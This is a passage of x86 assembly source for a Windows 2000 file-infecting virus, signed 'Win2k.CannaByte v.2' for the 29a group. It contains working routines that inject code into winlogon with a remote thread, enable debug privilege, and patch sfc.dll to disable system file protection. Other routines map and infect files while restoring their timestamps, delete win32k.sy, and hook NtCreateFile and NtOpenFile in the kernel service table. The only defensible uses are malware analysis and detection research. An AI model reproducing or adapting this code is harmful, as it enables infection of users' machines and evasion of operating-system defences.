mov [ebp + Ntdll],eax mov eax,[ebp + NtKernel] GezApi eax,LoadLibraryACRC,LLNameLen push eax lea ebx,[ebp + advapi] push ebx call eax mov [ebp + NtAdvapi],eax lea ebx,[ebp + psapi] push ebx call dword ptr [esp + 4] mov [ebp + NtPsapi],eax lea ebx,[ebp + rasapi] push ebx call dword ptr [esp + 4] mov [ebp + NtRasapi],eax lea ebx,[ebp + imagehlp] push ebx call dword ptr [esp + 4] mov [ebp + NtImagehlp],eax pop eax popad ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; FreeLibrarys: pushad mov eax,[ebp + NtKernel] GezApi eax,FreeLibraryCRC,FLNameLen push eax push dword ptr [ebp + NtAdvapi] call dword ptr [esp + 4] push dword ptr [ebp + NtPsapi] call dword ptr [esp + 4] push dword ptr [ebp + NtRasapi] call dword ptr [esp + 4] push dword ptr [ebp + NtImagehlp] call dword ptr [esp + 4] pop eax popad ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;GetWinlogon in:none out: WinlogonHand with winlogon process handle ; eax = 0 if no error ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetWinlogon: pushad mov ecx,200h SaveSpaceSearchingWinlogon: push 00000000h loop SaveSpaceSearchingWinlogon ;esp -> array of id of processes mov eax,esp lea ebx,[ebp + Needed] push ebx push 4*200h push eax mov eax,[ebp + NtPsapi] GezApi eax,EnumProcessesCRC,EPSNameLen call eax dec eax jnz GetWinlogonOutError_ ;esp -> array mov esi,esp lodsd SearchWinlogon: lodsd push esi or eax,eax jz GetWinlogonOutError ;vvv mov [ebp + WinlogonID],eax push eax xor eax,eax push eax mov eax,10h or 400h or 20h or 2h or 8h push eax mov eax,[ebp + NtKernel] GezApi eax,OpenProcessCRC,OPNameLen call eax or eax,eax jz NoWinlogonFound ;eax = process handle mov [ebp + WinlogonHand],eax lea ebx,[ebp + Needed] push ebx push 4 lea ebx,[ebp + WinlogonModuleHand] push ebx push eax mov eax,[ebp + NtPsapi] GezApi eax,EnumProcessModulesCRC,EPMNameLen call eax dec eax jnz NoWinlogonFound push 50 lea eax,[ebp + WinlogonModuleName] push eax push dword ptr [ebp + WinlogonModuleHand] push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtPsapi] GezApi eax,GetModuleBaseNameACRC,GMBNNameLen call eax lea esi,[ebp + WinlogonModuleName] lodsd or eax,20202020h cmp eax,'lniw' winl equ $ - 4 jne NoWinlogonFound lodsd or eax,20202020h cmp eax,'nogo' ogon equ $ - 4 jne NoWinlogonFound ;^^^ WinLogonFound: pop esi GetWinlogonOut: add esp,4*200h popad xor eax,eax ret NoWinlogonFound: pop esi jmp SearchWinlogon GetWinlogonOutError: pop esi GetWinlogonOutError_: add esp,4*200h popad xor eax,eax inc eax ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;AttackWinlogon in:none ; out: eax = 1 error eax = 0 no error ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; AttackWinlogon: push PAGE_READWRITE push MEM_RESERVE or MEM_COMMIT push evirus - svirus push 0 push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,VirtualAllocExCRC,VANameLen call eax or eax,eax jz AttackWinlogonError mov [ebp + WinlogonVirusBase],eax mov ecx,[ebp + NtKernel] mov ebx,[ebp + WinlogonHand] lea edx,[ebp + svirus] mov esi,evirus - svirus Writez ecx,ebx,eax,edx,esi or eax,eax jz AttackWinlogonError push 0 push 0 lea eax,[ebp + Needed] push eax;pointer to a variable to be passed to the thread function mov eax,[ebp + WinlogonVirusBase] add eax,WinlogonCode - svirus push eax push 0 ;stack size push 0 push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CreateRemoteThreadCRC,CRTNameLen call eax or eax,eax jz AttackWinlogonError AttackWinlogonNoError: push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax xor eax,eax ret AttackWinlogonError: push dword ptr [ebp + WinlogonHand] mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen call eax xor eax,eax inc eax ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; WinlogonCode: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;When i inject code to winlogon,i create a remote thread that will start execution here pop eax ;remove parameter passed callz WinlogonCodeDoff WinlogonCodeDoff: pop ebp sub ebp,offset WinlogonCodeDoff SfcDisable: lea eax,[ebp + sfc] push eax mov eax,[ebp + NtKernel] GezApi eax,LoadLibraryACRC,LLNameLen call eax or eax,eax jz ErrorSfcDisable mov [ebp + NtSfc],eax mov esi,[eax + 3ch] add esi,eax ;esi -> PE movzx eax,word ptr [esi + 14h];size of optional mov ecx,[eax + esi + 18h + 10h];size of section mov esi,[eax + esi + 18h + 0ch];virtual address of first section of sfc.dll add esi,dword ptr [ebp + NtSfc] ;esi -> code section SearchCodeToPatch: pushad lea edi,[ebp + CodeToSearch] mov ecx,11 rep cmpsb popad je CodeToPatchFound inc esi loop SearchCodeToPatch jmpz ErrorSfcDisable CodeToPatchFound: ;now we patch code with a call to ExitThread push esi mov eax,[ebp + NtKernel] GezApi eax,ExitThreadCRC,ETNameLen pop esi mov [ebp + PatchExitThreadDir],eax push esi ;i unprotect the mem where i go to patch ;UnprotectMem ; eax -> base of kernel ; esi -> dir of memory that will be writable. ; ecx -> bytes of that memory. ; ebx -> handle of the process where is the memory.If 0 this process mov eax,[ebp + NtKernel] mov ebx,0 mov ecx,_PatchCode - PatchCode callz UnprotectMem pop esi mov edi,esi lea esi,[ebp + PatchCode] mov ecx,_PatchCode - PatchCode PatchIt: movsb loop PatchIt ;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] GezApi eax,ExitThreadCRC,ETNameLen push 0 call eax ;;;;;;;;;;;;;;;;;;;;;; sfc db 'sfc.dll' NtSfc dd 0 CodeToSearch db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h PatchCode: push 0 mov eax,11111111h PatchExitThreadDir equ dword ptr $ - 4 call eax _PatchCode: ErrorSfcDisable: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;SECOND VERSION IMPROVEMENT FOR SFC DISABLE ;In the first version the method used for sfc disabling is for win2k only,so in this ;version,if the first one fails, we will try other trickz. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;; SfcDisableImprovement: ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] GezApi eax,ExitThreadCRC,ETNameLen push 0 call eax ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;End of code for injecting in winlogon process ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;MapFile ;it maps the file in _WIN32_FIND_DATA ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; MapFile: ChangeAttributesOfFile: lea edi,[ebp + _WIN32_FIND_DATA.WFD_szFileName] push 80h push edi mov eax,[ebp + NtKernel] GezApi eax,SetFileAttributesACRC,SFANameLen call eax push 0 push 0 push 3 push 0 push 1 push 0C0000000h ;read and write access to file lea eax,[ebp + _WIN32_FIND_DATA.WFD_szFileName] push eax mov eax,[ebp + NtKernel] GezApi eax,CreateFileACRC,CFNameLen call eax inc eax or eax,eax jnz np1 ret np1: dec eax mov [ebp + FileHandle],eax push 0 mov eax,[ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow] push eax push 0 push 4 push 0 push dword ptr [ebp + FileHandle] mov eax,[ebp + NtKernel] GezApi eax,CreateFileMappingACRC,CFMNameLen call eax or eax,eax jz CloseFile mov [ebp + MappingHandle],eax push dword ptr [ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow] push 0 push 0 push 000F001Fh ;access push eax ;MappingHandle mov eax,[ebp + NtKernel] GezApi eax,MapViewOfFileCRC,MVFNameLen call eax or eax,eax jz CloseMapping mov [ebp + ViewHandle],eax ret ;;;;;;;;;;;;;;;;;;;;;; CloseAll:;close file opened with MapFile mov eax,[ebp + NtKernel] GezApi eax,UnmapViewOfFileCRC,UVFNameLen push dword ptr [ebp + ViewHandle] call eax CloseMapping: mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen push dword ptr [ebp + MappingHandle] call eax CloseFile: RestoreAttributes: lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastWriteTime] push eax lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastAccessTime] push eax lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftCreationTime] push eax push dword ptr [ebp + FileHandle] mov eax,[ebp + NtKernel] GezApi eax,SetFileTimeCRC,SFTNameLen call eax mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen push dword ptr [ebp + FileHandle] call eax push dword ptr [ebp + _WIN32_FIND_DATA.WFD_dwFileAttributes] lea eax, [ebp+ _WIN32_FIND_DATA.WFD_szFileName] push eax mov eax,[ebp + NtKernel] GezApi eax,SetFileAttributesACRC,SFANameLen call eax ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;PayloadRing0.This function is the payload of the virus in ring0. ;When win32k.sys is loaded a song starts in internal speaker. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; PayloadRing0: Do equ 600 Re equ 674 ;(9/8) * Do ;1.125*Do Mi equ 750 ;(5/4) * Do ;1.25*Do Fa equ 798 ;(4/3) * Do ;1.33*Do Sol equ 900 ;(3/2) * Do ;1.5*Do La equ 996 ;(5/3) * Do ;1.66*Do Si_ equ 1124;(15/8)* Do ;1.875*Do Do2 equ 1220 Zilence equ 1 pushfd pushad ;;;;;;;;;;;;;;;;;;;;;;; cli in al, 61h ;save byte in 61h push ax cli ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; lea esi,word ptr [ebp + Song] WhatIfGodSmokedCannabis: lodsw mov cx,ax lodsw mov dx,ax or cx,cx je EndSong callz sound jmpz WhatIfGodSmokedCannabis EndSong: ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; callz Silence pop ax ; Restore information byte in port 61h out 61h, al sti ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; popad popfd ret ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; sound: ;cx = frec dl = duration in second(no more than 13 sec) pushad push dx set_ppi: mov al, 10110110b ; channel 2 out 43h, al ; operation and mode 3 set_freq: cmp cx,Zilence je IsASilence mov dx,12h mov ax,34dch div cx ; data for frec in ax: 1234dch / (cx = frec) out 42h, al mov al, ah out 42h, al active_spk: or al, 00000011b out 61h, al xor eax,eax pop ax ;al = duration in sec callz WaitX popad ret IsASilence: callz Silence pop ax ;al = duration in sec callz WaitX popad ret ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; WaitX: ;eax = multiplicator < 19 pushad mov ecx,1500000h VelAdjust equ dword ptr $ - 4 mul ecx;*eax mov ecx,eax loop $ popad ret ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; Silence: pushad in al, 61h and al, 11111100b ; 0FCh put off speaker out 61h, al popad ret ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; paystrings: db "Win2k.CannaByte v.2 by Super and Vallez for 29a",0dh,0ah db "The name of this virus is CannaByte!!!",0dh,0ah db "I hate avs changed viruses's names",0dh,0ah db "Plz,no change the name of this ;)",0 ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; TitleSong: db "What if god smoked cannabis?",0 Song: dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9 dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9 dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9 dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9 dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4 dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4 dw Mi,15,Zilence,2,Mi,15,Zilence,2,Mi,6,Mi,6,Mi,6,Zilence,6 dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,3 dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,4 dw Sol,6,La,6,Si_,9,Mi,12,Mi,9,Fa,6,Sol,6,Zilence,1 dw Sol,6,Sol,6,Sol,6,Sol,6,Fa,6,Mi,6,Re,6,Do,18,Zilence,3 dw Sol,9,Sol,9,Sol,9,Sol,9,Fa,9,Mi,9,Re,9,Do,18,0,0 ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;touch_privilege: i got this function from Ratter/29a's document about infection of winlogon. ;The function enable a privilege for me,and ill use to enable SeDebugPrivilege for later ill ;be able to modify winlogon memory space. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; touch_privilege: mov ebx, ebp touch_privilege_ proc near local process_token:DWORD local privilege_luid:QWORD local token_privilegez:TOKEN_PRIVILEGES pushad @SEH_SetupFrame xchg eax, edi call dword ptr [ebx+tGetCurrentProcess] lea edx, [process_token] push edx push TOKEN_ADJUST_PRIVILEGES push eax call dword ptr [ebx+tOpenProcessToken] dec eax jnz touch_privilege_end lea edx, [token_privilegez.TP_luid] push edx push esi push eax call dword ptr [ebx+tLookupPrivilegeValueA] dec eax jnz touch_privilege_close_p_token push eax push eax push type(TOKEN_PRIVILEGES) lea edx, [token_privilegez] push 1 pop dword ptr [edx] mov dword ptr [edx.TP_attribz], edi push edx push eax push dword ptr [process_token] call dword ptr [ebx+tAdjustTokenPrivileges] touch_privilege_close_p_token: push eax push dword ptr [process_token] call dword ptr [ebx+tCloseHandle] pop eax touch_privilege_end: @SEH_RemoveFrame mov dword ptr [esp.Pushad_eax], eax popad leave retn touch_privilege_ endp ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;MapFileRing0 maps a file using kernel mode apis. As MapFile fuction for user ;mode, MapFileRing0 has a CloseAllRing0 function for saving changes and close handles ;MapFile get the name and directory handle from FileNameRing0 and RootDirectoryRing0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; MapFileRing0: pushad ;objects_attributes struc ; oa_length dd ? ;lenght of this structure ; oa_rootdir dd ? ; oa_objectname dd ? ;name of the object ; oa_attribz dd ? ;attributes of the object ; oa_secdesc dd ? ; oa_secqos dd ? ;objects_attributes ends ; ;pio_status struc ; ps_ntstatus dd ? ; ps_info dd ? ;pio_status ends mov [ebp + FileAttributesRing0.oa_length],24 mov eax,[ebp + RootDirectoryRing0] mov [ebp + FileAttributesRing0.oa_rootdir],eax lea eax,[ebp + FileNameRing0] mov [ebp + FileAttributesRing0.oa_objectname],eax mov dword ptr [ebp + FileAttributesRing0.oa_attribz],OBJ_CASE_INSENSITIVE mov dword ptr [ebp + FileAttributesRing0.oa_secdesc],0 mov dword ptr [ebp + FileAttributesRing0.oa_secqos],0 push FILE_OPEN_FOR_BACKUP_INTENT or \ FILE_SYNCHRONOUS_IO_NONALERT or \ FILE_NON_DIRECTORY_FILE ;OpenOptions push FILE_SHARE_READ or \ FILE_SHARE_WRITE ;Share access lea eax,[ebp + io_statusRing0] push eax lea eax,[ebp + FileAttributesRing0] push eax push FILE_READ_DATA or\ FILE_WRITE_DATA or\ FILE_APPEND_DATA or\ STANDART_RIGTHS_REQUIRED ;desired access lea eax,[ebp + FileHandRing0] push eax call dword ptr [ebp + ZwOpenFilez] ;I get a handle to the file test eax,eax jne ErrorMappingRing0 mov eax,[ebp + FileHandRing0] push eax push SEC_COMMIT ;allocation attributes push PAGE_READWRITE ;page protection push 00000000h ;maximun size push 00000000h ;objects attributes NULL push SECTION_QUERY or \ SECTION_MAP_WRITE or \ SECTION_MAP_READ or \ STANDART_RIGTHS_REQUIRED ;desired access lea eax,[ebp + SectionHandRing0] push eax call dword ptr [ebp + ZwCreateSectionz] ;I get a handle to a created section test eax,eax je np1Ring0 callz Close1Ring0 jmpz ErrorMappingRing0 np1Ring0: ;no problem getting section so continue mov dword ptr [ebp + SectionBaseAddressRing0],0 mov dword ptr [ebp + SectionOffsetRing0],0 mov dword ptr [ebp + SectionOffsetRing0 + 4],0 mov dword ptr [ebp + SectionViewSizeRing0],0 push 00000004h push 00000000h push 00000001h lea eax,[ebp + SectionViewSizeRing0] push eax lea eax,[ebp + SectionOffsetRing0] push eax push 00000000h push 00000000h lea eax,[ebp + SectionBaseAddressRing0] push eax push 0FFFFFFFFh ;i specify the caller process,...i suppose thought im in ring0 this will ;not give problems. mov eax,[ebp + SectionHandRing0] push eax call dword ptr [ebp + ZwMapViewOfSectionz] ;I get a view of the section test eax,eax je NoErrorMappingRing0 callz Close2Ring0 jmpz ErrorMappingRing0 NoErrorMappingRing0: popad mov eax,[ebp + SectionBaseAddressRing0] ret ErrorMappingRing0: popad xor eax,eax ret ;;;;;;;;;;;;;;;;;;;;;; CloseAllRing0: Close3Ring0: push dword ptr [ebp + SectionBaseAddressRing0] push 0FFFFFFFFh call dword ptr [ebp + ZwUnmapViewOfSectionz] ;I unmap the view of the section Close2Ring0: push dword ptr [ebp + SectionHandRing0] call dword ptr [ebp + ZwClosez] ;I close the hand to the section Close1Ring0: push dword ptr [ebp + FileHandRing0] call dword ptr [ebp + ZwClosez] ;I close the hand to the file ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;GetApisRing0 gets some apis coz we need to be fast when we r in the hook rutine,or the ;system will go slowly...We cant to be using all time GezApi ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetApisRing0: pushfd pushad mov eax,[ebp + Ntoskrnl] GezApi eax,ZwUnmapViewOfSectionCRC,ZUVOSNameLen mov [ebp + ZwUnmapViewOfSectionz],eax mov eax,[ebp + Ntoskrnl] GezApi eax,ZwCloseCRC,ZCNameLen mov [ebp + ZwClosez],eax mov eax,[ebp + Ntoskrnl] GezApi eax,ZwMapViewOfSectionCRC,ZMVOSNameLen mov [ebp + ZwMapViewOfSectionz],eax mov eax,[ebp + Ntoskrnl] GezApi eax,ZwOpenFileCRC,ZOFNameLen mov [ebp + ZwOpenFilez],eax mov eax,[ebp + Ntoskrnl] GezApi eax,ZwCreateSectionCRC,ZCSNameLen mov [ebp + ZwCreateSectionz],eax popad popfd ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;DeleteWin32ksy will delete win32k.sy file if still not deleted ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; DeleteWin32ksy: pushfd pushad ;From Ring3 part we have in Buffer system32 path in ansi string. We will use StringRing0 ;for creating a unicode string with win32k.sy name. lea edi,[ebp + StringRing0] lea esi,[ebp + StartUnicode] mov ecx,8 xor eax,eax CopyStartUnicode: movsb loop CopyStartUnicode lea esi,[ebp + Buffer] CalcLenString push ecx xor eax,eax CopyPathSystem32: movsb stosb loop CopyPathSystem32 mov al,'\' stosb xor eax,eax stosb lea esi,[ebp + win32ksy] CalcLenString xor eax,eax CopyFileNameWin32ksy: movsb stosb loop CopyFileNameWin32ksy ;we have in StringRing0 'pathsystem32\win32k.sy' pop ecx ;len of path of system32 in ansi shl ecx,1 ;len in unicode add ecx,28 ;len of that path + len of \??\ and win32k.sy name in ecx mov word ptr [ebp + FileNameRing0.us_Length],cx mov word ptr [ebp + FileNameRing0.us_MaximumLength],cx lea eax,[ebp + StringRing0] mov [ebp + FileNameRing0.us_Buffer],eax ;usually deletion of files is done with a specific call to NtSetInformationFile. With this ;call the file is deleted when last handle to it is closed. However ill use other ;undocumented api,ZwDeleteFile. With ZwDeleteFile the file is deleted without waiting ;last handle was closed. lea eax,[ebp + FileNameRing0] mov dword ptr [ebp + FileAttributesRing0.oa_objectname],eax mov dword ptr [ebp + FileAttributesRing0.oa_length] ,24 mov dword ptr [ebp + FileAttributesRing0.oa_rootdir],0 mov dword ptr [ebp + FileAttributesRing0.oa_attribz],40h mov dword ptr [ebp + FileAttributesRing0.oa_secdesc],0h mov dword ptr [ebp + FileAttributesRing0.oa_secqos] ,0h lea eax,dword ptr [ebp + FileAttributesRing0] push eax mov eax,[ebp + Ntoskrnl] GezApi eax,ZwDeleteFileCRC,ZDFNameLen call eax ;file must be deleted popad popfd ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;UnhookWhile and RehookAgain put off and put on the hook ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;NtCreateFileAddr ;NtOpenFileAddr ;NtCreateFileEntryAddr ;NtOpenFileEntryAddr ;;;;;;;;;;;;;;;;;;;;;; UnhookWhile: ;;;;;;;;;;;; pushad mov eax,[ebp + NtCreateFileAddr] mov ebx,[ebp + NtCreateFileEntryAddr] mov [ebx],eax mov eax,[ebp + NtOpenFileAddr] mov ebx,[ebp + NtOpenFileEntryAddr] mov [ebx],eax popad ret ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;; RehookAgain: ;;;;;;;;;;;; pushad lea eax,[ebp + NtCreateFileHookRutine] mov ebx,[ebp + NtCreateFileEntryAddr] mov [ebx],eax lea eax,[ebp + NtOpenFileHookRutine] mov ebx,[ebp + NtOpenFileEntryAddr] mov [ebx],eax popad ret ;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Some Variables Needed dd 0 NtKernel dd 0 NtAdvapi dd 0 NtPsapi dd 0 NtRasapi dd 0 Ntdll dd 0 NtImagehlp dd 0 advapi db 'advapi32.dll',0 psapi db 'psapi.dll',0 rasapi db 'rasapi32.dll',0 imagehlp db 'imagehlp.dll',0 win32ksys db 'win32k.sys',0 win32ksy db 'win32k.sy',0 win32kfuck db 'win32k.fuck',0 StartUnicode db '\',0,'?',0,'?',0,'\',0 WinlogonHand dd 0 WinlogonID dd 0 WinlogonModuleHand dd 0 WinlogonModuleName db 50 dup(?) WinlogonVirusBase dd 0 tAdjustTokenPrivileges dd 0 tCloseHandle dd 0 tLookupPrivilegeValueA dd 0 tOpenProcessToken dd 0 tGetCurrentProcess dd 0 CurDir db 256 dup(0) _WIN32_FIND_DATA WIN32_FIND_DATA ? FileHandle dd 0 MappingHandle dd 0 ViewHandle dd 0 SearchHand dd 0 Buffer db 256 dup (?) aux dd 0 KernelThreadHand dd 0 EntryPointWin32ksys dd 0 EntryPoint dd 0 KeServiceDescriptorTable dd 0 Ntoskrnl dd 0 SSDT dd 0 NtCreateFileAddr dd 0 NtOpenFileAddr dd 0 NtCreateFileEntryAddr dd 0 NtOpenFileEntryAddr dd 0 AttributesFileRing0 dd ? CreateDispositionFileRing0 dd ? CreateOptionsFileRing0 dd ? FileNameRing0 unicode_string ? StringRing0 dw 256 dup(0) RootDirectoryRing0 dd 0 FileAttributesRing0 objects_attributes ? io_statusRing0 pio_status ? FileHandRing0 dd ? SectionHandRing0 dd ? SectionOffsetRing0 dq 0 SectionBaseAddressRing0 dd 0 SectionViewSizeRing0 dd 0 ZwMapViewOfSectionz dd 0 ZwCreateSectionz dd 0 ZwOpenFilez dd 0 ZwUnmapViewOfSectionz dd 0 ZwClosez dd 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ padding: PADDING equ 4 -(((padding - svirus) - (4*((padding - svirus)/4)))) db PADDING dup (00h) evirus: end start end